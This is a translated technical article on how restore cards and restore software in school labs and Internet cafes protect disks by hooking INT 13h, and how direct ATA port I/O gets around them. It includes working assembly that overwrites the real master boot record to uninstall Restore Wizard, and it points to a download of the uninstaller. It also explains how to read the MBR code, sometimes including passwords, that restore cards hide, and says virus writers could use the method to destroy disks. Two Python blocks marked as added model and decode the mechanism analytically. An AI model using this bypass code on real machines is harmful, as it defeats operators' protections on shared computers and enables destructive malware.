Code that can get through restore cards and restore software

Restore cards and restore software are widely used in public settings such as school computer rooms and Internet cafes. These restore cards and restore software (hereinafter "virtual restore technology") record every write to the hard disk: whether you copy files onto the disk, move or delete them, or even format a partition, everything is back to its state before the operation as soon as you restart. Some virtual restore vendors even add the words "prevents all computer viruses" to their advertising. This kind of virtual restore really does protect the machines in a public computer room well. Is there really no way through this protection? The answer is no: there is a way, and I will explain it step by step below.

I. Principles of virtual restore technology

What follows is the technique commonly used by restore cards and restore software. Different vendors differ in detail, of course, but the principle is the same. First, the restore card or restore software seizes control at boot: it saves the original sector at head 0, cylinder 0, sector 1 (the master boot record, MBR) in some other sector (which sector is used for the backup varies), and writes its own code into head 0, cylinder 0, sector 1 so that this code runs before the operating system, very much like a boot-sector virus. Let us look at what the virtual restore technology does before the operating system starts:
1. It saves the entry address of INT 13h from the interrupt vector table.
2. It writes its own code, which will replace the INT 13h handler, into memory and remembers that code's entry address. This "writing into memory" is not an ordinary write but what we call making the program "resident"; I will not go into the implementation of resident programs here.
If you are not familiar with it, look up the relevant material, or find an enthusiast at www.hackart.org or www.lsky.net.
3. It changes the INT 13h entry in the interrupt vector table to the entry address of this resident program.
In addition, after modifying the INT 13h entry, virtual restore programs often modify some other interrupt entries as well, again through the resident program. These are used to monitor the INT 13h entry in the interrupt vector table: as soon as a change is detected, the entry is put back at once. This too is there to prevent the protection from being cracked.

So, as you have seen, the code that replaces the INT 13h handler is the heart of virtual restore technology. What does this code do? The following is my own, somewhat superficial, understanding:

1. It intercepts all INT 13h operations on head 0, cylinder 0, sector 1. This covers both reads and writes: every operation on head 0, cylinder 0, sector 1 is redirected to the sector where the virtual restore program backed up the original MBR. This protects the virtual restore code from being destroyed and from being read out and cracked: even when you look at the master boot area with a sector editor, what you actually see is the backed-up master boot area.

2. It intercepts all INT 13h writes to the hard disk. This includes writes through the conventional INT 13h (hard disks of 8 GB or less), writes through the extended INT 13h, which addresses the disk by sector number, and even the extended INT 13h writes for some non-IDE hard disks. How the writes are intercepted is the key to virtual restore technology. In the early DOS days it could simply be "do nothing": when the user wrote, nothing was actually done. But today's operating systems must perform some necessary writes to the hard disk, for example writes to virtual memory.
As everyone knows, virtual memory actually lives on the hard disk, and forbidding the operating system to write to it is obviously unthinkable.
Therefore most virtual restore vendors set aside some hard disk space in which to record the write operations to the hard disk, and revert this record when the system restarts. How exactly the hard disk writes are recorded I have never fully worked out; the "science" in it must lie in the trade-off between time and hard disk space, that is, how to record the hard disk writes using the least time and the least disk space is the key. Friends who have ideas about this are welcome to get in touch with me.

3. It backs up the contents of CMOS ports 70h and 71h, and compares the current contents of ports 70h and 71h with the backup; if they differ, it prompts whether to restore, and checks by password whether the BIOS modification is legitimate.

II. The interrupt mechanism

The PC's interrupts provide the most basic interface between hardware and software. They free the programmer from knowing the details of the hardware system: as long as the system is called directly, the corresponding function is completed, which makes programming much more convenient. The mechanism works as follows. When an interrupt source raises an interrupt request, the CPU can decide whether to respond to it (when the CPU is doing more important work it may not respond). If the interrupt is allowed, the CPU finishes the current instruction, pushes the address of the next instruction, the contents of the registers and the state of the flags onto the stack, and then jumps to the entry point of the service routine for that interrupt source and performs the interrupt processing. When the processing is complete, the saved registers, flag state and instruction pointer are restored, so that the CPU returns to the breakpoint and continues with the next instruction.
To distinguish all the interrupts, the PC system assigns each interrupt an interrupt number N; for example INT 3h is the breakpoint interrupt, INT 10h is the video interrupt, and what we are discussing today is mainly INT 13h, the disk read/write interrupt. To be clear, what I have said here is far from a complete account of the PC interrupt mechanism; if you are unfamiliar with it, look up some material or get in touch with me. What matters to us today is INT 13h. Let us look at what the BIOS interrupts actually do for us. Simply put, a BIOS interrupt is an interrupt provided by the BIOS on your machine; so what lies behind the BIOS? In fact, it is a set of input and output operations on ports. Each port of the PC implements a specific function, and we can do without the interrupts the BIOS provides and instead use the input/output instructions to operate these ports directly, achieving the same effect as calling the BIOS interrupt. The precondition is that you must know these ports in detail. Seen the other way round, a great advantage of the PC's interrupt system is that it lets programmers program without that knowledge; from this point of view an interrupt is a bit like what we usually call "encapsulation". I am not sure this is the right way to put it, but an interrupt does indeed hide the details of the underlying system.
III. Meaning of the hard disk read/write ports

The hard disk's commonly used ports are 1F0h to 1F7h, with the following meanings:

Port   Read/Write   Meaning
1F0h   read/write   Data register: the byte (word) currently being transferred
1F1h   read         Error register: the error of the last operation
1F2h   read/write   Number of sectors to read or write
1F3h   read/write   Sector number to read or write
1F4h   read/write   Low 8 bits of the cylinder number to read or write
1F5h   read/write   High 2 bits of the cylinder number (the upper 6 bits are always 0)
1F6h   read/write   Drive and head: bit 7 always 1, bit 6 always 0, bit 5 always 1, bit 4 = 0 for the first hard disk and 1 for the second, bits 3-0 = head number to read or write
1F7h   read         Status of the operation:
                    bit 7  controller busy
                    bit 6  drive ready
                    bit 5  write fault
                    bit 4  seek complete
                    bit 3  1 = sector buffer ready
                    bit 2  disk data read correctly (after correction)
                    bit 1  index: the disk sets this bit to 1
                    bit 0  the command ended because of an error
1F7h   write        Command register; the command to issue is one of:
50h   format track
20h   read sector
21h   read sector without verifying that the sector is ready
22h   read long sector (on early hard disks a sector is not necessarily 512 bytes but somewhere between 128 and 1024 bytes)
23h   read long sector without verifying that the sector is ready
30h   write sector
31h   write sector directly, without verifying that the sector is ready
32h   write long sector
33h   write long sector without verifying that the sector is ready

Looking at this table you will of course notice that this way of reading and writing is the head/cylinder/sector style of hard disk access; nevertheless, reading and writing of hard disks larger than 8 GB is also done through ports 1F0h to 1F7h.

IV. An example of reading the hard disk through port I/O and through INT 13h

Let us look at a program that reads the hard disk both through input/output port operations and through INT 13h. The example shows in detail the ports used when reading the hard disk, and compares the master boot area read through INT 13h with the master boot area read through port I/O, to confirm that the two operations do the same thing. The program fragment is as follows:

        MOV  DX, 1F6H           ; drive and head register
        MOV  AL, 0A0H           ; drive 0, head 0
        OUT  DX, AL
        MOV  DX, 1F2H           ; number of sectors to read
        MOV  AL, 1              ; read one sector
        OUT  DX, AL
        MOV  DX, 1F3H           ; sector number
        MOV  AL, 1              ; sector 1
        OUT  DX, AL
        MOV  DX, 1F4H           ; low 8 bits of the cylinder number
        MOV  AL, 0              ; low 8 bits are 0
        OUT  DX, AL
        MOV  DX, 1F5H           ; high 2 bits of the cylinder number
        MOV  AL, 0              ; high 2 bits are 0 (1F4H and 1F5H together select cylinder 0)
        OUT  DX, AL
        MOV  DX, 1F7H           ; command register
        MOV  AL, 20H            ; read sector
        OUT  DX, AL
STILL_GOING:
        IN   AL, DX             ; read the status register
        TEST AL, 8              ; sector buffer ready?
        JZ   STILL_GOING        ; if not ready yet, keep waiting
        MOV  CX, 512/2          ; loop count: 512 bytes = 256 words
        MOV  DI, OFFSET BUFFER  ; ES:DI receives the data
        MOV  DX, 1F0H           ; data register
        REP  INSW               ; transfer 256 words into BUFFER (REP INSW assumed here; the listing omitted the transfer instruction)
; ----- the following reads head 0, cylinder 0, sector 1 through INT 13H
        MOV  AX, 201H           ; AH=02h read sectors, AL=1 sector
        MOV  DX, 80H            ; DL=80h first hard disk, DH=head 0
        MOV  CX, 1              ; CH=cylinder 0, CL=sector 1
        MOV  BX, OFFSET BUFFER2 ; ES:BX receives the data
        INT  13H
; ----- the following compares the sector read by the two methods
        MOV  CX, 512
        MOV  SI, OFFSET BUFFER
        MOV  DI, OFFSET BUFFER2
        REPE CMPSB
        JNE  FAILURE
        MOV  AH, 9
        MOV  DX, OFFSET READMSG
        INT  21H
        JMP  GOOD_EXIT
FAILURE:
        MOV  AH, 9
        MOV  DX, OFFSET FAILMSG
        INT  21H
GOOD_EXIT:
; ----- the following ends the program
        MOV  AX, 4C00H          ; exit to DOS
        INT  21H
READMSG DB 'The buffers match. Hard disk read using ports.$'
FAILMSG DB 'The buffers do not match.$'
BUFFER  DB 512 DUP ('V')
BUFFER2 DB 512 DUP ('L')

V. Code that can get through the protection of restore cards and restore software

Read the meanings of the hard disk ports once more, then look at the example above, and you will have a fair understanding of reading the hard disk through its ports. Now back to our theme. As you have probably guessed by now, the code that can get through the protection of restore cards and restore software is exactly input/output on the hard disk ports. We can now understand it from first principles: what the restore card intercepts is the interrupt, but it cannot intercept input/output operations, so port I/O can write to the hard disk, and of course port I/O can also read the critical part that the virtual restore program hides, namely head 0, cylinder 0, sector 1, which the restore card or restore software shields. Once this principle is known, everyone will see it in their own way: a cracker of virtual restore technology, a virus writer and a designer of virtual restore technology will each draw their own conclusions from it.
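A toy model of sections I and V, added here and not from the article: the resident INT 13h code redirects MBR accesses to the backup sector, records writes in an overlay that is discarded on restart, and, because the overlay only sees traffic that passes through the hook, a write that reaches the disk by another path is neither recorded nor reverted. The overlay layout is my assumption; real products keep their record differently.

```python
# Added example (not from the article). Sectors are addressed by
# (cylinder, head, sector) tuples and the "disk" is a dict. The overlay
# representation is an assumption, not a vendor's actual record format.

MBR = (0, 0, 1)

class Disk:
    """The physical hard disk: everything written here survives a restart."""
    def __init__(self, sectors):
        self.sectors = dict(sectors)
    def read(self, chs):
        return self.sectors.get(chs, b"\0" * 512)
    def write(self, chs, data):
        self.sectors[chs] = data

class RestoreHook:
    """Stands in for the resident code hung on INT 13h."""
    def __init__(self, disk, backup_chs):
        self.disk, self.backup = disk, backup_chs
        disk.write(backup_chs, disk.read(MBR))          # save the original MBR
        disk.write(MBR, b"RESTORE-CODE".ljust(512, b"\0"))
        self.overlay = {}                               # recorded writes
    def _map(self, chs):
        return self.backup if chs == MBR else chs       # principle 1: redirect MBR
    def int13_read(self, chs):
        chs = self._map(chs)
        return self.overlay.get(chs, self.disk.read(chs))
    def int13_write(self, chs, data):
        self.overlay[self._map(chs)] = data             # principle 2: record, not write
    def restart(self):
        self.overlay.clear()                            # recorded writes vanish

def scenario():
    """Constructed run; returns what each observer sees."""
    disk = Disk({MBR: b"ORIGINAL-MBR".ljust(512, b"\0")})
    hook = RestoreHook(disk, backup_chs=(0, 0, 60))
    hook.int13_write((5, 1, 7), b"user data")
    seen_before = hook.int13_read((5, 1, 7))
    mbr_via_int13 = hook.int13_read(MBR)[:12]          # the backup, not the real MBR
    hook.restart()
    seen_after = hook.int13_read((5, 1, 7))
    # a write that never passes through the hook is neither recorded nor reverted
    disk.write((9, 0, 3), b"direct")
    hook.restart()
    survived = hook.int13_read((9, 0, 3))
    return seen_before, seen_after, mbr_via_int13, disk.read(MBR)[:12], survived
```

The designer's lesson is the last two values: a filter placed at the interrupt layer can only revert what it saw.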
Here I must emphasize that I do not approve of writing viruses, but a virus writer could use this principle to write a virus that destroys the hard disk in spite of the restore card or restore software, so I want to remind users of virtual restore technology: do not take things lightly just because you have a restore card or restore software. Be aware that a virus which penetrates the virtual restore technology and destroys the hard disk is possible; imagine this principle applied to the CIH virus or to a "hard disk killer" virus, and the consequences would be unbearable. Now let us talk about how this code that penetrates virtual restore technology can be used to crack restore software (for example Restore Wizard). Below is the code I wrote to test cracking Restore Wizard; the program compiled from it must be run under pure DOS. With this code I successfully uninstalled Restore Wizard.
        .286
CODE    SEGMENT
        ASSUME CS:CODE, DS:CODE, ES:CODE
START:
; ----- the following reads the master boot area with INT 13H
        MOV  AX, 0201H          ; AH=02h read sectors, AL=1 sector
        MOV  DX, 0080H          ; first hard disk, head 0
        MOV  CX, 0001H          ; cylinder 0, sector 1
        MOV  BX, 7C00H          ; ES:BX receives the data
        INT  13H
; ----- the following writes the master boot area through the I/O ports
        MOV  DX, 1F6H           ; drive and head register
        MOV  AL, 0A0H           ; drive 0, head 0
        OUT  DX, AL
        MOV  DX, 1F2H           ; number of sectors to write
        MOV  AL, 1              ; write one sector
        OUT  DX, AL
        MOV  DX, 1F3H           ; sector number
        MOV  AL, 1              ; sector 1
        OUT  DX, AL
        MOV  DX, 1F4H           ; low 8 bits of the cylinder number
        MOV  AL, 0              ; low 8 bits are 0
        OUT  DX, AL
        MOV  DX, 1F5H           ; high 2 bits of the cylinder number
        MOV  AL, 0              ; high 2 bits are 0
        OUT  DX, AL
        MOV  DX, 1F7H           ; command register
        MOV  AL, 30H            ; write sector
        OUT  DX, AL
OOGLE:
        IN   AL, DX             ; read the status register
        TEST AL, 8              ; sector buffer ready?
        JZ   OOGLE
        MOV  CX, 512/2          ; loop count: 512 bytes = 256 words
        MOV  SI, 7C00H          ; DS:SI = data to send
        MOV  DX, 1F0H           ; data register
        REP  OUTSW              ; send the data
; ----- exit the program
        MOV  AH, 4CH
        INT  21H
CODE    ENDS
        END  START

It is very simple, as described below:
1. First, with Restore Wizard installed, read the original master boot area using INT 13h. Although the request is for head 0, cylinder 0, sector 1, what is actually read is the backup of the original master boot area.
2. Write the original master boot area just read into the real master boot area through port I/O. In other words, Restore Wizard is completely removed. At this point you will find that Restore Wizard is gone.
I have written an uninstaller for Win98/NT/XP which anyone can download from www.lsky.net, but someone got there before me with an MBR-clearing program for Internet cafes. I tried it and found that it works; I have not analysed the program carefully, but I am sure of its principle. That program is well written, but I think there is room for improvement: my own hard disk MBR program is one I wrote myself to implement multiple boot, and when I ran that MBR-clearing program my multi-boot code was gone. I think the program could change its core part into code like mine: under Restore Wizard it writes the MBR from before Restore Wizard back into the master boot area, and even on a hard disk that has no Restore Wizard it merely writes the master boot area back to itself, so there is no danger. The method above does not necessarily crack a restore card, because a restore card is hardware after all: it runs before the hard disk boots, so even if you write the hard disk's master boot area back, the restore card can write it back again. However, when cracking a restore card you can use the principle in this article to read the real code the restore card has written into the hard disk's master boot area; some restore cards even keep their password in this sector. For manufacturers of restore cards and restore software, how to make their restore card or restore software safer may be a problem worth thinking about.
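A register-level decoder, added here and not from the article, for anyone analysing traces or designing a monitor that must understand port traffic: it turns a sequence of OUT instructions to 1F0h-1F7h, as an emulator or debugger would record them, into the ATA command being issued, using the register map of section III. It goes beyond the article in one respect: bit 6 of 1F6h set means LBA addressing, in which case 1F3h, 1F4h, 1F5h and the low nibble of 1F6h form a 28-bit sector address.

```python
# Added example (not from the article): decode ATA task-file writes.
COMMANDS = {0x20: "read sectors", 0x21: "read sectors (no retry)",
            0x22: "read long", 0x23: "read long (no retry)",
            0x30: "write sectors", 0x31: "write sectors (no retry)",
            0x32: "write long", 0x33: "write long (no retry)",
            0x50: "format track"}

# Status register (1F7h read) bit names, bit 0 first, as in section III.
STATUS_BITS = ["error", "index", "corrected", "drq", "seek_complete",
               "write_fault", "drive_ready", "busy"]

def decode_status(value):
    """Names of the set bits in a byte read from 1F7h."""
    return {name for bit, name in enumerate(STATUS_BITS) if value >> bit & 1}

def decode_trace(trace):
    """trace: iterable of (port, byte) OUT operations. Returns one dict per
    command, i.e. per write to 1F7h, built from the registers written so far."""
    regs, commands = {}, []
    for port, val in trace:
        if port == 0x1F7:
            drv_head = regs.get(0x1F6, 0xA0)
            cmd = {"command": COMMANDS.get(val, "unknown 0x%02X" % val),
                   "drive": drv_head >> 4 & 1,
                   "count": regs.get(0x1F2, 0) or 256}   # ATA: count 0 means 256
            if drv_head & 0x40:                           # LBA mode (beyond the article)
                cmd["lba"] = (regs.get(0x1F3, 0) | regs.get(0x1F4, 0) << 8
                              | regs.get(0x1F5, 0) << 16 | (drv_head & 0x0F) << 24)
            else:                                         # CHS, as in the article's listings
                cmd["cylinder"] = regs.get(0x1F4, 0) | (regs.get(0x1F5, 0) & 3) << 8
                cmd["head"] = drv_head & 0x0F
                cmd["sector"] = regs.get(0x1F3, 0)
            commands.append(cmd)
        elif 0x1F1 <= port <= 0x1F6:
            regs[port] = val & 0xFF
    return commands

# Constructed trace: the register writes from the read listing in section IV.
READ_MBR_TRACE = [(0x1F6, 0xA0), (0x1F2, 1), (0x1F3, 1),
                  (0x1F4, 0), (0x1F5, 0), (0x1F7, 0x20)]
```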